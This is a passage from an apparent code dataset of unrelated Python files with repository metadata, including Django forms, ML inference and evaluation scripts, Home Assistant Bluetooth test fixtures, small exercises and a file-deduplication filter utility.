node_lookup\n\n # Creates graph from saved graph_def.pb.\n inception.create_graph('model/classify_image_graph_def.pb')\n node_lookup = inception.NodeLookup('model/imagenet_2012_challenge_label_map_proto.pbtxt',\n 'model/imagenet_synset_to_human_label_map.txt')\n\ndef run(request):\n try:\n input = request.get_data(False)\n count = request.args.get('count')\n \n if count:\n res = inception.run_inference_on_image(node_lookup, input, int(count))\n else:\n res = inception.run_inference_on_image(node_lookup, input)\n\n return res\n\n except Exception as e:\n return str(e)\n","repo_name":"Azure/AML-AirField","sub_path":"Image/inceptionv3/score.py","file_name":"score.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"61"} +{"seq_id":"26433259630","text":"from django import forms\r\nfrom .models import Event, Comment, Locations\r\nfrom RSO.models import Rso\r\nRATINGS = (\r\n ('1', '1 Star'),\r\n ('2', '2 Stars'),\r\n ('3', '3 Stars'),\r\n ('4', '4 Stars'),\r\n ('5', '5 Stars')\r\n)\r\n\r\nclass EventForm(forms.Form):\r\n name = forms.CharField(widget=forms.TextInput(attrs={'placeholder': 'Event Name*', 'class': 'text-center text-white', 'id': 'event_name'}), label=\"\", required=True)\r\n category = forms.CharField(widget=forms.TextInput(attrs={'placeholder': 'Event Category*', 'class': 'text-center text-white', 'id': 'event_category'}), label=\"\", required=True)\r\n description = forms.CharField(widget=forms.TextInput(attrs={'placeholder': 'Describe the event.*', 'class': 'text-center text-white', 'id': 'event_description'}), label=\"\", required=True)\r\n start_time = forms.TimeField(widget=forms.TimeInput(attrs={'placeholder': '10:00*', 'id': 'event_start*'}), label=\"\", required=True)\r\n end_time = forms.TimeField(widget=forms.TimeInput(attrs={'placeholder': '12:00*', 'id': 'event_end*'}), label=\"\", required=True)\r\n date = forms.DateField(widget=forms.SelectDateWidget(attrs={'class': 'bg-transparent', 'id': 'event_date*'}), label=\"\", required=True)\r\n phone = forms.IntegerField(widget=forms.NumberInput(attrs={'placeholder': '8881239999*', 'id': 'event_phone*', 'class': 'text-center text-white'}), label=\"\", required=True)\r\n email = forms.CharField(widget=forms.TextInput(attrs={'placeholder': 'email@realemails.com*', 'id': 'event_email*', 'class': 'text-center text-white'}), label=\"\", required=True)\r\n\r\n # need to add is_RSO , is_private, and so on\r\n def save(self, is_private, is_RSO, location, user_university, user_rso, current_user):\r\n data = self.cleaned_data\r\n current_rso = Rso.objects.filter(id=user_rso.id).first() if user_rso is not None else None\r\n current_event = Event(name = data['name'], \r\n date = data['date'],\r\n start_time = data['start_time'],\r\n category = data['category'],\r\n end_time = data['end_time'],\r\n description = data['description'],\r\n phone = data['phone'],\r\n email = data['email'],\r\n is_public = True if (is_RSO == False and is_private == None) else False,\r\n is_RSO = True if is_RSO else False,\r\n is_private = True if is_private else False,\r\n is_approved = False if is_RSO == False else True,\r\n location = location,\r\n university = user_university,\r\n rso = current_rso if current_rso is not None else None,\r\n admin = current_user)\r\n current_event.save()\r\n\r\n\r\nclass CommentForm(forms.Form):\r\n content = forms.CharField(widget=forms.TextInput(attrs={'placeholder': 'Comment Here', 'class': 'text-center text-white', 'id': 'create_event_comment'}), label=\"\", required=True)\r\n rating = forms.ChoiceField(choices=RATINGS, label=\"\", required=True)\r\n\r\n def save(self, current_user, current_event):\r\n data = self.cleaned_data\r\n current_comment = Comment(content = data['content'],\r\n rating = data['rating'],\r\n user = current_user,\r\n event = current_event)\r\n current_comment.save()\r\n\r\nclass LocationForm(forms.Form):\r\n location_name = forms.CharField(widget=forms.TextInput(attrs={'placeholder': 'Location Name*', 'class': 'text-center text-white', 'id': 'location_name'}), label=\"\", required=True)\r\n latitude = forms.CharField(widget=forms.TextInput(attrs={'placeholder': 'Latitude*', 'class': 'text-center text-white', 'id': 'location_latitude'}), label=\"\", required=True)\r\n longitude = forms.CharField(widget=forms.TextInput(attrs={'placeholder': 'Longitude*', 'class': 'text-center text-white', 'id': 'location_longitude'}), label=\"\", required=True)\r\n\r\n def save(self):\r\n data = self.cleaned_data\r\n current_location = Locations(location_name = data['location_name'],\r\n latitude = data['latitude'],\r\n longitude = data['longitude'])\r\n current_location.save()\r\n return current_location","repo_name":"yao1999/College-Event-Website","sub_path":"college_event_website/Events/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":4492,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"35315903312","text":"import os\nimport numpy as np\nimport cv2\nimport torch\nimport torchvision\nfrom model import *\nfrom argparse import ArgumentParser\nimport time\n\n\nparser = ArgumentParser()\nparser.add_argument(\"--device\",default=\"cuda:0\", type=str)\nparser.add_argument(\"--input_img\",default=\"1.jpg\", type=str)\nargs = parser.parse_args()\n\nclasses = ['T-shirt/top','Trouser','Pullover','Dress','Coat','Sandal','Shirt','Sneaker','Bag','Ankle Boot']\ndevice=torch.device(args.device)\nbatch_size = 64\nepochs = 10\nlr = 0.00\n\ntransform = torchvision.transforms.Compose([\n torchvision.transforms.ToTensor(),\n torchvision.transforms.Resize(32)\n])\n\nimg = cv2.imread(args.input_img)\nimg = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n\ntensor = transform(img).unsqueeze(0).to(device)\n\n\nmodel = mnistF_classifire()\nmodel = model.to(device)\n\n \nmodel.load_state_dict(torch.load('mnist_Fashion.pth'))\nmodel.eval()\ntic= time.time()\npred = model(tensor)\nelapsed = time.time() - tic\npred = pred.cpu().detach().numpy()\npred = np.argmax(pred)\noutput = classes[pred]\n\nprint(f\"model prediction: {output} \\n inference time= {elapsed}\")\n","repo_name":"ganjbakhshali/Fashion_Mnist_torch","sub_path":"inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"16294009466","text":"import torch\nimport os\nimport numpy as np\nimport argparse\nimport pandas as pd\nimport random\nfrom tqdm import tqdm \nimport pickle\nimport spacy\n\n\ndef compute_pragmatic_scores(\n df_path, \n annotations_dir,\n output_path,\n):\n \"\"\"\n Function for computing the contrastivity / pragmatic quality of captions produced\n by a model. The expected input comprises as long dataframe containing\n a column with target IDs, a column with distractor IDs, and a column with \n predicted caption for the target. The function creates a csv reults file with raw\n annotations for each prediction.\n\n Arguments:\n ---------\n df_path: str\n Path to csv file containing target ids, distractor ids, and traget predictions.\n annotations_dir: str\n Path to directory containing the full dataset files.\n output_path: str\n Path where to write output results csv file to.\n \"\"\"\n torch.manual_seed(1234)\n random.seed(1234)\n # check that results file exists\n assert os.path.exists(df_path) or df_path is not None, \"Please provide the results file with the -rf option or check the spelling of the path you provided!\"\n \n # load dependency parser corpus\n try:\n nlp = spacy.load(\"en_core_web_sm\")\n except:\n raise ValueError(\"Dependency parser corpus missing. Please install spacy and run 'python -m spacy download en_core_web_sm' \")\n df = pd.read_csv(df_path)\n # check that the columns exist\n assert all([d in df.columns for d in [\"target_id\", \"prediction\", \"distractor_id\"]]), \"The results file must contain the columns target_id, prediction, distractor_id\"\n assert os.path.exists(os.path.join(annotations_dir, \"3dshapes_labels.npy\")), \"Make sure to run the sandbox prediction without the flag load_as_sandbox so as to generate the numeric labels numpy file for the full dataset, or double check file name and location.\"\n\n # load ground truth numeric annotations\n numeric_labels = np.load(os.path.join(annotations_dir, \"3dshapes_labels.npy\"))\n # load terminals for constructing admissible captions\n with open(os.path.join(annotations_dir, \"3dshapes_grammar_terminals.pkl\"), \"rb\") as f:\n feature_terminals = pickle.load(f)\n \n binary_contrasts = []\n contrast_efficiency_scores = []\n relevance_scores = []\n shape_mentions = []\n scale_mentions = []\n shape_color_mentions = []\n wall_color_mentions = []\n orientation_mentions = []\n floor_color_mentions = []\n shape_mentions_c = []\n scale_mentions_c = []\n shape_color_mentions_c = []\n wall_color_mentions_c = []\n orientation_mentions_c = []\n floor_color_mentions_c = []\n num_n_list = []\n num_d_list = []\n num_f_list = []\n num_f_dist_list = []\n shape_color_mentioned = 0\n\n for i, r in tqdm(df.iterrows()):\n # retrieve numeric labels of target and distractor\n target_num_label = numeric_labels[r[\"target_id\"]]\n dist_num_label = numeric_labels[r[\"distractor_id\"]]\n # find features along which they differ (i.e., contrastive features)\n contrastive_features_inds = np.where(target_num_label - dist_num_label != 0)[0].tolist()\n # compute the numer of contrastive descriptions\n num_contrastive_descriptions = len(contrastive_features_inds)\n # construct all appropriate description referring to the contrastive features\n # i.e., correct adjective phrases (n-grams) or unigrams, in case the respective feature (relevant for hue only) is unique (e.g., only the object is blue, \n # then it is assumed to be fine to only say blue, without the noun; but not if e.g. the floor is also blue)\n\n # construct all sentences for filtering all mentioned features\n ground_truth_expressions = []\n ground_truth_expressions_dist = []\n target_shape = feature_terminals[\"shape\"][target_num_label[4]][0].split(\" -> \")[-1].replace(\"'\", \"\")\n distractor_shape = feature_terminals[\"shape\"][dist_num_label[4]][0].split(\" -> \")[-1].replace(\"'\", \"\")\n colors_list = [\"red\", \"orange\", \"yellow\", \"green\", \"cyan\", \"blue\", \"purple\", \"pink\"]\n sizes_list = [\"tiny\", \"small\", \"medium\", \"middle sized\", \"big\", \"large\", \"huge\", \"giant\"]\n\n # for ind, name in list(zip(contrastive_features_inds, contrastive_features_names)):\n for ind, name in enumerate(list(feature_terminals.keys())):\n target_val = target_num_label[ind]\n # retrieve annotation\n terminals = feature_terminals[name][target_val]\n nl_expr = terminals[0].split(\" -> \")[-1].replace(\"'\", \"\")\n # get head noun for color\n head_noun = name.split(\"_\")[0]\n if head_noun == \"object\":\n # retrieve NL label for the shape\n head_noun = target_shape\n \n elif head_noun == \"orientation\" or head_noun == \"scale\" or head_noun == \"shape\":\n head_noun = \"\"\n nl_phrase = nl_expr + \" \" + head_noun\n nl_phrase = nl_phrase.strip()\n \n # check if respective value is unique and we can also consider the unigram (specific to colors, the others are unigrams anyways)\n if head_noun != \"orientation\" and target_num_label[:3].tolist().count(target_val) == 1:\n ground_truth_expressions.append(nl_expr)\n else:\n ground_truth_expressions.append(nl_phrase.replace(\"in the \", \"\").replace(\"on the \", \"\"))\n\n # do the same procedure for identifying distractor ground truth expressions for checking if any generated expressions which are false of target\n # are true of distractor\n dist_val = dist_num_label[ind]\n # retrieve annotation\n dist_terminals = feature_terminals[name][dist_val]\n dist_nl_expr = dist_terminals[0].split(\" -> \")[-1].replace(\"'\", \"\")\n # get head noun for color\n dist_head_noun = name.split(\"_\")[0]\n if dist_head_noun == \"object\":\n # retrieve NL label for the shape\n dist_head_noun = distractor_shape\n \n elif dist_head_noun == \"orientation\" or dist_head_noun == \"scale\" or dist_head_noun == \"shape\":\n dist_head_noun = \"\"\n dist_nl_phrase = dist_nl_expr + \" \" + dist_head_noun\n dist_nl_phrase = dist_nl_phrase.strip()\n \n # check if respective value is unique and we can also consider the unigram (specific to colors, the others are unigrams anyways)\n if dist_head_noun != \"orientation\" and dist_num_label[:3].tolist().count(dist_val) == 1:\n ground_truth_expressions_dist.append(dist_nl_expr)\n else:\n ground_truth_expressions_dist.append(dist_nl_phrase.replace(\"in the \", \"\").replace(\"on the \", \"\")) \n \n contrastive_expressions = [ground_truth_expressions[e] for e in contrastive_features_inds]\n \n # compute dependency parse for checking if the shape hue was mentioned (as one phrase)\n dep_parse = nlp(r[\"prediction\"])\n dep_parse_table = pd.DataFrame({\n \"token\": [t.text for t in dep_parse],\n \"tag\": [t.tag_ for t in dep_parse],\n \"head\": [t.head.text for t in dep_parse],\n \"dep\": [t.dep_ for t in dep_parse],\n })\n modifiers = dep_parse_table[(dep_parse_table[\"dep\"] == \"acomp\") | (dep_parse_table[\"dep\"] == \"amod\") | (dep_parse_table[\"dep\"] == \"attr\")][\"token\"].values\n \n # check presence of contrastive expressions in the generated caption\n num_produced_contrasts = 0\n produced_contrasts = []\n produced_contrastive_inds = []\n for j, e in enumerate(contrastive_expressions):\n if e in r[\"prediction\"]:\n num_produced_contrasts += 1\n produced_contrasts.append(e)\n produced_contrastive_inds.append(contrastive_features_inds[j])\n if contrastive_features_inds[j] == 2:\n shape_color_mentioned = 1\n # also check if contrastive features were produced predicatively in case they don't occur literally\n if e not in produced_contrasts:\n if e in modifiers:\n # check that the modified noun is the correct one\n mod_head = dep_parse_table[dep_parse_table[\"token\"] == e][\"head\"].values[0]\n # define correct head noun \n if contrastive_features_inds[j] == 0:\n h_n = \"wall\"\n elif contrastive_features_inds[j] == 1:\n h_n = \"floor\"\n elif contrastive_features_inds[j] in [2, 3, 4]:\n h_n = target_shape\n else:\n h_n = \"orientation\"\n \n # check that wither the head noun is the correct one\n # or the head is a verb and the sentence subject is the correct noun\n if (mod_head == h_n) or\\\n (any([\"VB\" in r for r in dep_parse_table[dep_parse_table[\"token\"] == mod_head][\"tag\"].values]) and\n any([r == \"nsubj\" for r in dep_parse_table[dep_parse_table[\"token\"] == h_n][\"dep\"].values]) ):\n num_produced_contrasts += 1\n produced_contrasts.append(e)\n produced_contrastive_inds.append(contrastive_features_inds[j])\n\n # print(\"Number of produced contrastive exprs \", num_produced_contrasts)\n num_d_list.append(num_produced_contrasts)\n \n # actually record produced dicriminative features\n floor_color_mentions_c.append(1 if 0 in produced_contrastive_inds else 0)\n wall_color_mentions_c.append(1 if 1 in produced_contrastive_inds else 0)\n shape_color_mentions_c.append(1 if 2 in produced_contrastive_inds else 0)\n scale_mentions_c.append(1 if 3 in produced_contrastive_inds else 0)\n shape_mentions_c.append(1 if 4 in produced_contrastive_inds else 0)\n orientation_mentions_c.append(1 if 5 in produced_contrastive_inds else 0)\n\n \n # retrieve constituents containing nouns (shape, floor, wall, orientation related descriptions)\n heads_tokens = dep_parse_table[(dep_parse_table[\"tag\"] == \"NN\") | (dep_parse_table[\"tag\"] == \"JJ\")][\"token\"].tolist()\n \n heads_tags = dep_parse_table[(dep_parse_table[\"tag\"] == \"NN\") | (dep_parse_table[\"tag\"] == \"JJ\")][\"tag\"].tolist()\n ngrams = [dep_parse_table[dep_parse_table[\"dep\"] == \"ROOT\"][\"token\"].tolist()[0]] \n num_false_features = 0\n false_toks = []\n false_toks_true_dist = []\n num_false_toks_true_dist = 0\n for n in heads_tokens:\n if n not in [\"picture\", \"front\", \"wall\", \"floor\", \"unk\", \"pad\", \"standing\", \"a\", \"on\", \"in\", \"the\", \"of\"] and n not in \" \".join(ground_truth_expressions):\n num_false_features += 1\n false_toks.append(n)\n if n in \" \".join(ground_truth_expressions_dist):\n num_false_toks_true_dist += 1\n false_toks_true_dist.append(n)\n \n num_f_list.append(num_false_features)\n num_f_dist_list.append(num_false_toks_true_dist)\n\n # to account for non-discriminative features, check for each ground truth expression if it occurs in the prediction \n produced_features = [f for f in ground_truth_expressions if f in r[\"prediction\"]]\n num_n_list.append(len(produced_features) - num_produced_contrasts)\n # check occurences of different features for bias statistics\n floor_color_mentions.append(1 if any([n + \" floor\" in r[\"prediction\"] for n in colors_list ]) else 0) \n wall_color_mentions.append(1 if any([n + \" wall\" in r[\"prediction\"] for n in colors_list]) else 0) \n orientation_mentions.append(1 if any([n in r[\"prediction\"] for n in [\"middle\", \"corner\", \"left\", \"right\"] ]) else 0)\n shape_mentions.append(1 if any([target_shape in r[\"prediction\"]]) else 0)\n scale_mentions.append(1 if any([a in r[\"prediction\"] for a in sizes_list]) else 0)\n\n\n # if no contrastive color was produced, check if it was produced redundantly, either only the adj (if color value unique)\n # or if it cooccurred with the shape\n if shape_color_mentioned == 0:\n target_shape_color = ground_truth_expressions[2]\n if target_num_label[2] != dist_num_label[2]:\n shape_color_mentioned = 1 if target_shape_color.split(\" \")[0] in r[\"prediction\"] else 0\n else:\n shape_color_mentioned = 1 if ((target_shape_color.split(\" \")[0] in r[\"prediction\"]) and (target_shape in r[\"prediction\"])) else 0\n \n shape_color_mentions.append(shape_color_mentioned)\n binary_contrasts.append(1 if num_produced_contrasts > 0 else 0)\n if num_contrastive_descriptions == 1:\n if num_produced_contrasts == 1:\n contrast_efficiency_scores.append(1)\n else:\n contrast_efficiency_scores.append(0)\n else:\n contrast_efficiency_scores.append(1 - (num_produced_contrasts-1)/(num_contrastive_descriptions-1) if num_produced_contrasts > 0 else 0)\n\n\n relevance_scores.append(1-(len(produced_features) - num_produced_contrasts) / (6 - num_contrastive_descriptions))\n\n\n df_out = pd.DataFrame({\n \"target_id\": df[\"target_id\"],\n \"distractor_id\": df[\"distractor_id\"],\n \"prediction\": df[\"prediction\"],\n \"binary_contrastiveness\": binary_contrasts,\n \"contrastive_efficiency\": contrast_efficiency_scores,\n \"relevance\": relevance_scores,\n \"is_floor_hue\": floor_color_mentions,\n \"is_wall_hue\": wall_color_mentions,\n \"is_object_hue\": shape_color_mentions,\n \"is_scale\": scale_mentions,\n \"is_shape\": shape_mentions,\n \"is_orientation\": orientation_mentions,\n \"is_floor_hue_disc\": floor_color_mentions_c,\n \"is_wall_hue_disc\": wall_color_mentions_c,\n \"is_object_hue_disc\": shape_color_mentions_c,\n \"is_scale_disc\": scale_mentions_c,\n \"is_shape_disc\": shape_mentions_c,\n \"is_orientation_disc\": orientation_mentions_c,\n \"num_mentioned_features\": np.array(floor_color_mentions) + np.array(wall_color_mentions) + np.array(shape_color_mentions) + np.array(scale_mentions) + np.array(orientation_mentions) + np.array(shape_mentions),\n \"num_nondiscriminative\": num_n_list,\n \"num_discriminative\": num_d_list,\n \"num_false\": num_f_list,\n \"num_false_true_of_dist\": num_f_dist_list,\n })\n df_out.to_csv(output_path)\n\n # print final statistics to stdout\n print(\"------------------ Evaluation summary --------------------\")\n print(\"--- Numer of evaluated predictions: \", len(df_out))\n print(\"--- Average number of features mentioned in each prediction: \", df_out[\"num_mentioned_features\"].mean())\n print(\"--- Average number of contrastive features mentioned: \" , df_out[\"num_discriminative\"].mean())\n print(\"--- Average number of non-contrastive features mentioned: \", df_out[\"num_nondiscriminative\"].mean())\n print(\"--- Average number of false features mentioned: \", df_out[\"num_false\"].mean())\n print(\"--- Average number of false features true of distractor mentioned: \", df_out[\"num_false_true_of_dist\"].mean())\n print(\"--- Average discriminativity: \", df_out[\"binary_contrastiveness\"].mean())\n print(\"--- Average contrastive efficiency: \", df_out[\"contrastive_efficiency\"].mean())\n print(\"--- Average relevance: \", df_out[\"relevance\"].mean())\n print(\"-----------------------------------------------------------\")\n\nif __name__ == \"__main__\":\n # read in cmd args\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\"-p\", \"--path\", help = \"path to directory with sandbox and / or full data\", nargs = \"?\", default = \"../sandbox/data\")\n parser.add_argument(\"-rf\", \"--results_file\", help = \"path to file containing predictions and pairs ids to be evaluated\", type = str)\n parser.add_argument(\"-o\", \"--output_path\", help = \"path where to write output results to\", nargs = \"?\", default = \"pragmatic_eval_results.csv\", type = str)\n \n\n args = parser.parse_args()\n\n \n compute_pragmatic_scores(\n df_path=args.results_file, \n annotations_dir=args.path,\n output_path=args.output_path,\n )","repo_name":"polina-tsvilodub/3dshapes-language","sub_path":"pragmatic_evaluation/pragmatic_eval.py","file_name":"pragmatic_eval.py","file_ext":"py","file_size_in_byte":16758,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"74123405634","text":"if __name__ == '__main__':\n # write other type of object\n \"\"\"\n Other types of objects need to be converted \n – either to a string (in text mode) or a bytes object (in binary mode) \n – before writing them:\n \"\"\"\n value = ('the answer', 42)\n s = str(value)\n with open('write_other_type_object.txt', 'w+')as file:\n character_nums = file.write(s)\n print('character_nums: {}'.format(character_nums))\n # f.seek(offset,whence)--To change the file object’s position\n \"\"\"\n offset:the reference point\n whence:\n 0 measures from the beginning of the file, --default value\n 1 uses the current file position, \n output_formatting_1 uses the end of the file as the reference point\n \"\"\"\n print('------------seek--------------')\n with open('seek_file.txt','rb+')as f:\n # read and write\n num=f.write(b'0123456789abcdef')\n print('num: {}'.format(num))\n f.seek(5)\n read_b=f.read(5)\n print('read_b: {}'.format(read_b))\n\n","repo_name":"HolyQuar/git_operation","sub_path":"python_operation/input_output_4/fancier_output_formatting/method_of_file_objects_7.2.py","file_name":"method_of_file_objects_7.2.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20413959605","text":"\"\"\"Tests for the Improv via BLE integration.\"\"\"\n\nfrom improv_ble_client import SERVICE_DATA_UUID, SERVICE_UUID\n\nfrom homeassistant.components.bluetooth import BluetoothServiceInfoBleak\n\nfrom tests.components.bluetooth import generate_advertisement_data, generate_ble_device\n\nIMPROV_BLE_DISCOVERY_INFO = BluetoothServiceInfoBleak(\n name=\"00123456\",\n address=\"AA:BB:CC:DD:EE:F0\",\n rssi=-60,\n manufacturer_data={},\n service_uuids=[SERVICE_UUID],\n service_data={SERVICE_DATA_UUID: b\"\\x01\\x00\\x00\\x00\\x00\\x00\"},\n source=\"local\",\n device=generate_ble_device(address=\"AA:BB:CC:DD:EE:F0\", name=\"00123456\"),\n advertisement=generate_advertisement_data(\n service_uuids=[SERVICE_UUID],\n service_data={SERVICE_DATA_UUID: b\"\\x01\\x00\\x00\\x00\\x00\\x00\"},\n ),\n time=0,\n connectable=True,\n)\n\n\nPROVISIONED_IMPROV_BLE_DISCOVERY_INFO = BluetoothServiceInfoBleak(\n name=\"00123456\",\n address=\"AA:BB:CC:DD:EE:F0\",\n rssi=-60,\n manufacturer_data={},\n service_uuids=[SERVICE_UUID],\n service_data={SERVICE_DATA_UUID: b\"\\x04\\x00\\x00\\x00\\x00\\x00\"},\n source=\"local\",\n device=generate_ble_device(address=\"AA:BB:CC:DD:EE:F0\", name=\"00123456\"),\n advertisement=generate_advertisement_data(\n service_uuids=[SERVICE_UUID],\n service_data={SERVICE_DATA_UUID: b\"\\x04\\x00\\x00\\x00\\x00\\x00\"},\n ),\n time=0,\n connectable=True,\n)\n\n\nNOT_IMPROV_BLE_DISCOVERY_INFO = BluetoothServiceInfoBleak(\n name=\"Not\",\n address=\"AA:BB:CC:DD:EE:F2\",\n rssi=-60,\n manufacturer_data={\n 33: b\"\\x00\\x00\\xd1\\xf0b;\\xd8\\x1dE\\xd6\\xba\\xeeL\\xdd]\\xf5\\xb2\\xe9\",\n 21: b\"\\x061\\x00Z\\x8f\\x93\\xb2\\xec\\x85\\x06\\x00i\\x00\\x02\\x02Q\\xed\\x1d\\xf0\",\n },\n service_uuids=[],\n service_data={},\n source=\"local\",\n device=generate_ble_device(address=\"AA:BB:CC:DD:EE:F2\", name=\"Aug\"),\n advertisement=generate_advertisement_data(),\n time=0,\n connectable=True,\n)\n","repo_name":"Clesyde/core-2023.11.1","sub_path":"tests/components/improv_ble/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"140180243","text":"print(\"Welcome to the Love Calculator!\")\nname1 = input(\"What is your name? \\n\")\nname2 = input(\"What is their name? \\n\")\n\nlower_imie1 = name1.lower()\nlower_imie2 = name2.lower()\n\ncount_t = lower_imie1.count(\"t\")\ncount_r = lower_imie1.count(\"r\")\ncount_u = lower_imie1.count(\"u\")\ncount_e1 = lower_imie1.count(\"e\")\ncount_t_2 = lower_imie2.count(\"t\")\ncount_r_2 = lower_imie2.count(\"r\")\ncount_u_2 = lower_imie2.count(\"u\")\ncount_e1_1 = lower_imie2.count(\"e\")\n\ncount_l = lower_imie2.count(\"l\")\ncount_o = lower_imie2.count(\"o\")\ncount_v = lower_imie2.count(\"v\")\ncount_e2 = lower_imie2.count(\"e\")\ncount_l_2 = lower_imie1.count(\"l\")\ncount_o_2 = lower_imie1.count(\"o\")\ncount_v_2 = lower_imie1.count(\"v\")\ncount_e2_2 = lower_imie1.count(\"e\")\n\ntrue_total = count_t + count_r + count_u + count_e1 + count_t_2 + count_r_2 + count_u_2 + count_e1_1\nlove_total = count_l + count_o + count_v + count_e2 + count_l_2 + count_o_2 + count_v_2 + count_e2_2\n\nlove_result = str(true_total) + str(love_total)\nif int(love_result) < 10 or int(love_result) > 90:\n print(f\"Your score is {love_result}, you go together like coke and mentos.\")\nelif int(love_result) >= 40 and int(love_result) <= 50:\n print(f\"Your score is {love_result}, you are alright together.\")\nelse:\n print(f\"Your score is {love_result}.\")","repo_name":"AlanWes/coding_everyday","sub_path":"12.03.23_Love_Calculator.py","file_name":"12.03.23_Love_Calculator.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9063736073","text":"def fatia_max(p, r, v):\n soma_parcial = [v[p]]*len(v[p:r])\n for i in range(p+1,r):\n soma_parcial[i] = soma_parcial[i-1]+v[i]\n soma_max = 0\n for i in range(p+1,r):\n for j in range(p,i):\n soma = soma_parcial[i]-soma_parcial[j]\n if i == p:\n soma_max = soma\n nlin, ncol = j, i\n else:\n if soma_max < soma:\n soma_max = soma\n nlin, ncol = j, i\n return soma_max, nlin, ncol\n\ndef main():\n v = [31, -41, 59, 26, -53, 58, 97, -93, -23, 84]\n print('Teste fatia_max')\n print(fatia_max(0,10,v))\n print()\n print(fatia_max(2,9,v))\n print()\n print(fatia_max(3,9,v))\n print()\n print(fatia_max(7,10,v))\nmain()\n'''\n In [12]:v = [31, -41, 59, 26, -53, 58, 97, -93, -23, 84]\n\n In [13]: fatia_max_meio(0,1,2,v)\n Out[13]: (-10, 0, 2)\n\n In [14]: fatia_max_meio(0,2,3,v)\n Out[14]: (49, 0, 3)\n\n In [15]: fatia_max_meio(0,2,4,v)\n Out[15]: (75, 0, 4)\n\n In [16]: fatia_max_meio(0,2,5,v)\n Out[16]: (75, 0, 4)\n\n In [17]: fatia_max_meio(0,2,6,v)\n Out[17]: (80, 0, 6)\n\n In [18]: fatia_max_meio(0,3,6,v)\n Out[18]: (90, 2, 6)\n\n In [19]: fatia_max_meio(0,3,5,v)\n Out[19]: (85, 2, 4)\n\n In [20]: fatia_max_meio(3,5,6,v)\n Out[20]: (31, 3, 6)\n\n In [21]: fatia_max_meio(3,5,7,v)\n Out[21]: (128, 3, 7)\n'''\n\n\n\n","repo_name":"HelloWounderworld/Review-Python","sub_path":"O-que-Fiz-Na-Faculdade/MAC2/EPs-MAC2/EPX2/testes.py","file_name":"testes.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"22022501593","text":"import hashlib\nimport logging\nimport os\nfrom typing import Any, Dict, Optional, Set\n\nlogger = logging.getLogger(__name__)\n\n\nclass DirectoryFileFilter(object):\n \"\"\"A predicate that will return False if / when a proposed file's\n content to-be-written is identical to the contents of the file on\n disk allowing calling code to safely skip the write.\n\n Raises:\n ValueError: directory doesn't exist\n\n >>> testfile = '/tmp/directory_filter_text_f39e5b58-c260-40da-9448-ad1c3b2a69c2.txt'\n >>> contents = b'This is a test'\n >>> with open(testfile, 'wb') as wf:\n ... wf.write(contents)\n 14\n\n >>> d = DirectoryFileFilter('/tmp')\n\n >>> d.apply(contents, testfile) # False if testfile already contains contents\n False\n\n >>> d.apply(b'That was a test', testfile) # True otherwise\n True\n\n >>> os.remove(testfile)\n \"\"\"\n\n def __init__(self, directory: str):\n \"\"\"\n Args:\n directory: the directory we're filtering accesses to\n \"\"\"\n super().__init__()\n from pyutils.files import file_utils\n\n if not file_utils.does_directory_exist(directory):\n raise ValueError(directory)\n self.directory = directory\n self.md5_by_filename: Dict[str, str] = {}\n self.mtime_by_filename: Dict[str, float] = {}\n self._update()\n\n def _update(self):\n \"\"\"\n Internal method. Foreach file in the directory, compute its\n MD5 checksum via :meth:`_update_file`.\n \"\"\"\n for direntry in os.scandir(self.directory):\n if direntry.is_file(follow_symlinks=True):\n mtime = direntry.stat(follow_symlinks=True).st_mtime\n path = f\"{self.directory}/{direntry.name}\"\n self._update_file(path, mtime)\n\n def _update_file(self, filename: str, mtime: Optional[float] = None):\n \"\"\"\n Internal method. Given a file and mtime, compute its MD5 checksum\n and persist it in an internal map.\n \"\"\"\n from pyutils.files import file_utils\n\n assert file_utils.does_file_exist(filename)\n if mtime is None:\n mtime = file_utils.get_file_raw_mtime(filename)\n assert mtime is not None\n if self.mtime_by_filename.get(filename, 0) != mtime:\n md5 = file_utils.get_file_md5(filename)\n logger.debug(\n \"Computed/stored %s's MD5 at ts=%.2f (%s)\", filename, mtime, md5\n )\n self.mtime_by_filename[filename] = mtime\n self.md5_by_filename[filename] = md5\n\n def apply(self, proposed_contents: Any, filename: str) -> bool:\n \"\"\"Call this with the proposed new contents of filename in\n memory and we'll compute the checksum of those contents and\n return a value that indicates whether they are identical to\n the disk contents already (so you can skip the write safely).\n\n Args:\n proposed_contents: the contents about to be written to\n filename\n filename: the file about to be populated with\n proposed_contents\n\n Returns:\n True if the disk contents of the file are identical to\n proposed_contents already and False otherwise.\n \"\"\"\n self._update_file(filename)\n file_md5 = self.md5_by_filename.get(filename, 0)\n logger.debug(\"%s's checksum is %s\", filename, file_md5)\n mem_hash = hashlib.md5()\n mem_hash.update(proposed_contents)\n md5 = mem_hash.hexdigest()\n logger.debug(\"Item's checksum is %s\", md5)\n return md5 != file_md5\n\n\nclass DirectoryAllFilesFilter(DirectoryFileFilter):\n \"\"\"A predicate that will return False if a file to-be-written to a\n particular directory is identical to any other file in that same\n directory (regardless of its name).\n\n i.e. this is the same as :class:`DirectoryFileFilter` except that\n our :meth:`apply` method will return true not only if the contents\n to be written are identical to the contents of filename on the\n disk but also it returns true if there exists some other file\n sitting in the same directory which already contains those\n identical contents.\n\n >>> testfile = '/tmp/directory_filter_text_f39e5b58-c260-40da-9448-ad1c3b2a69c3.txt'\n\n >>> contents = b'This is a test'\n >>> with open(testfile, 'wb') as 